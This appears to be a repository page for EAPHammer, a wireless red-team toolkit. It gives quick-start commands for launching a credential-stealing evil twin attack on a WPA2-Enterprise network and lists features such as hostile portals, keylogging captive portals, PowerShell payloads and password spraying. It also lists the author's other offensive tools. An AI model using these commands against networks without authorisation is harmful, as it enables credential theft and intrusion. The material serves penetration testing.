• Stars
    star
    2,006
  • Rank 23,087 (Top 0.5 %)
  • Language
    C
  • License
    GNU General Publi...
  • Created almost 8 years ago
  • Updated 8 months ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Targeted evil twin attacks against WPA2-Enterprise networks. Indirect wireless pivots using hostile portal attacks.

logo

by Gabriel Ryan (s0lst1c3)(gabriel[at]solstice|d0t|sh)

Foo

Current release: v1.13.5

Supports Python 3.5+.

Overview

EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such, focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate just how fast this tool is, our Quick Start section provides an example of how to execute a credential stealing evil twin attack against a WPA/2-EAP network in just commands.

Disclaimer

EAPHammer (the "Software") and associated documentation is provided β€œAS IS”. The Developer makes no other warranties, express or implied, and hereby disclaims all implied warranties, including any warranty of merchantability and warranty of fitness for a particular purpose. Any actions or activities related to the use of the Software are the sole responsibility of the end user. The Developer will not be held responsible in the event that any criminal charges are brought against any individuals using or misusing the Software. It is up to the end user to use the Software in an authorized manner and to ensure that their use complies with all applicable laws and regulations.

Quick Start Guide - Kali

Begin by cloning the eaphammer repo using the following command:

git clone https://github.com/s0lst1c3/eaphammer.git

Next run the kali-setup file as shown below to complete the eaphammer setup process. This will install dependencies and compile the project:

./kali-setup

To setup and execute a credential stealing evil twin attack against a WPA/2-EAP network:

# generate certificates
./eaphammer --cert-wizard

# launch attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

Quick Start Guide - Parot OS (Security)

Begin by cloning the eaphammer repo using the following command:

git clone https://github.com/s0lst1c3/eaphammer.git

Next run the parot-setup file as shown below to complete the eaphammer setup process. This will install dependencies and compile the project:

./parot-setup

To setup and execute a credential stealing evil twin attack against a WPA/2-EAP network:

# generate certificates
./eaphammer --cert-wizard

# launch attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

Usage and Setup Instructions

For complete usage and setup instructions, please refer to the project's wiki page:

Features

  • Steal RADIUS credentials from WPA-EAP and WPA2-EAP networks.
  • Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots
  • Perform captive portal attacks
  • Built-in Responder integration
  • Support for Open networks and WPA-EAP/WPA2-EAP
  • No manual configuration necessary for most attacks.
  • No manual configuration necessary for installation and setup process
  • Leverages latest version of hostapd (2.8)
  • Support for evil twin and karma attacks
  • Generate timed Powershell payloads for indirect wireless pivots
  • Integrated HTTP server for Hostile Portal attacks
  • Support for SSID cloaking
  • Fast and automated PMKID attacks against PSK networks using hcxtools
  • Password spraying across multiple usernames against a single ESSID

New (as of Version 1.13.5)(latest):

EAPHammer now has a modular captive portal with keylogging and payload delivery capabilities, as well as an integrated website cloaner for easily creating portal modules.

WPA/2-PSK handshake captures (added as for version 1.7.0)

EAPHammer now supports WPA/2-PSK along with WPA handshake captures.

OWE (added as of Version 1.5.0):

EAPHammer now supports rogue AP attacks against OWE and OWE-Transition mode networks.

PMF (added as of Version 1.4.0)

EAPHammer now supports 802.11w (Protected Management Frames), Loud Karma attacks, and Known Beacon attacks (documentation coming soon).

GTC Downgrade Attacks

EAPHammer will now automatically attempt a GTC Downgrade attack against connected clients in an attempt to capture plaintext credentials (see: https://www.youtube.com/watch?v=-uqTqJwTFyU&feature=youtu.be&t=22m34s).

Improved Certificate Handling

EAPHammer's Cert Wizard has been expanded to provide users with the ability to create, import, and manage SSL certificates in a highly flexible manner. Cert Wizard's previous functionality has been preserved as Cert Wizard's Interactive Mode, which uses the same syntax as previous versions. See XIV - Cert Wizard for additional details.

TLS / SSL Backwards Compatibility

EAPHammer now uses a local build of libssl that exists independently of the systemwide install. This local version is compiled with support for SSLv3, allowing EAPHammer to be used against legacy clients without compromising the integrity of the attacker's operating system.

Supported EAP Methods

EAPHammer supports the following EAP methods:

  • EAP-PEAP/MSCHAPv2
  • EAP-PEAP/GTC
  • EAP-PEAP/MD5
  • EAP-TTLS/PAP
  • EAP-TTLS/MSCHAP
  • EAP-TTLS/MSCHAPv2
  • EAP-TTLS/MSCHAPv2 (no EAP)
  • EAP-TTLS/CHAP
  • EAP-TTLS/MD5
  • EAP-TTLS/GTC
  • EAP-MD5

802.11a and 802.11n Support

EAPHammer now supports attacks against 802.11a and 802.11n networks. This includes the ability to create access points that support the following features:

  • Both 2.4 GHz and 5 GHz channel support
  • Full MIMO support (multiple input, multiple output)
  • Frame aggregation
  • Support for 40 MHz channel widths using channel bonding
  • High Throughput Mode
  • Short Guard Interval (Short GI)
  • Modulation & coding scheme (MCS)
  • RIFS
  • HT power management

Upcoming Features

  • Perform seamless MITM attacks with partial HSTS bypasses
  • directed rogue AP attacks (deauth then evil twin from PNL, deauth then karma + ACL)
  • Integrated website cloner for cloning captive portal login pages
  • Integrated HTTP server for captive portals

Contributing

Contributions are encouraged and more than welcome. Please attempt to adhere to the provided issue and feature request templates.

Versioning

We use SemVer for versioning (or at least make an effort to). For the versions available, see https://github.com/s0lst1c3/eaphammer/releases.

License

This project is licensed under the GNU Public License 3.0 - see the LICENSE.md file for details.

Acknowledgments

This tool either builds upon, is inspired by, or directly incorporates nearly fifteen years of prior research and development from the following awesome people:

  • Brad Antoniewicz
  • Joshua Wright
  • Robin Wood
  • Dino Dai Zovi
  • Shane Macauly
  • Domanic White
  • Ian de Villiers
  • Michael Kruger
  • Moxie Marlinspike
  • David Hulton
  • Josh Hoover
  • James Snodgrass
  • Adam Toscher
  • George Chatzisofroniou
  • Mathy Vanhoef

For a complete description of what each of these people has contributed to the current wireless security landscape and this tool, please see:

EAPHammer leverages a modified version of hostapd-wpe (shoutout to Brad Anton for creating the original), dnsmasq, asleap, hcxpcaptool and hcxdumptool for PMKID attacks, Responder, and Python 3.5+.

Finally, huge shoutout to the SpecterOps crew for supporting this project and being a constant source of inspiration.

More Repositories

1

silentbridge

Silentbridge is a toolkit for bypassing 802.1x-2010 and 802.1x-2004.
C
218
star
2

dropengine

DropEngine provides a malleable framework for creating shellcode runners, allowing operators to choose from a selection of components and combine them to create highly sophisticated payloads within seconds.
Python
206
star
3

sentrygun

Rogue AP killer
Python
87
star
4

evil_twin

Python script for peforming basic Evil Twin attacks on open wifi networks. Written for my tutorial on the subject.
Python
37
star
5

grey_harvest

Scrapes the web for reliable http or https proxies and prints them to stdout. Can also be used as a python library to easily generate reliable proxies for use within Python applications.
Python
34
star
6

SharpFinder

C#
30
star
7

awae

Python
16
star
8

sentrygun-server

Python
14
star
9

rudydos

RUDY DOS attack script
Python
13
star
10

keyboardsnitch

Python
12
star
11

s0lst1c3.github.io

CSS
11
star
12

hostapd-eaphammer

[DEPRECATED UNTIL FURTHER NOTICE... use hostapd from s0lst1c3/eaphammer repo] Hostapd 2.6 patched with a trimmed version of hostapd-wpe for use in eaphammer
C
6
star
13

custom-ssh-backdoor

Custom ssh backdoor, coded in python using Paramiko
Python
5
star
14

allthecookies

Shell
5
star
15

osx_mic_record

Small command-line utility for recording audio using the builtin MacOS webcam mic.
Objective-C
4
star
16

bind_cannon

Asynchronous SSH bruteforcer written in Python 2.7 with parallel processing.
Python
3
star
17

hello.asm

Hello world in x86 nasm
Assembly
3
star
18

GhostalService

A mass emailer with 'from' header spoofing. Python 3.4.
Python
3
star
19

zot.li

Python
3
star
20

administration

Shell
2
star
21

mongodumper

Python
2
star
22

awae-ad-setup-scripts

PowerShell
2
star
23

txlab-ssh-callhome-scripts

Python
2
star
24

RomanNumerals

Simple javascript app that uses a stack based algorithm to convert roman numerals to base-10 ints.
JavaScript
2
star
25

owe-lab

Python
2
star
26

hostap-owe

C
1
star
27

RawBytes

Simple mutable raw byte array written in C
C++
1
star
28

proxychains_autoconf

Automagically generate a reliable proxylist for your proxychains.conf file
1
star
29

gamewarden

Python
1
star
30

dotify

Shell
1
star
31

benfords-law

Fraud detection script in homage of the methods used by the IRS
Python
1
star
32

stdez

Library for things I find myself doing a lot
C
1
star
33

arpsiege

Python
1
star
34

keylogger

Python
1
star
35

smf-gremlin

SMF password cracker
Python
1
star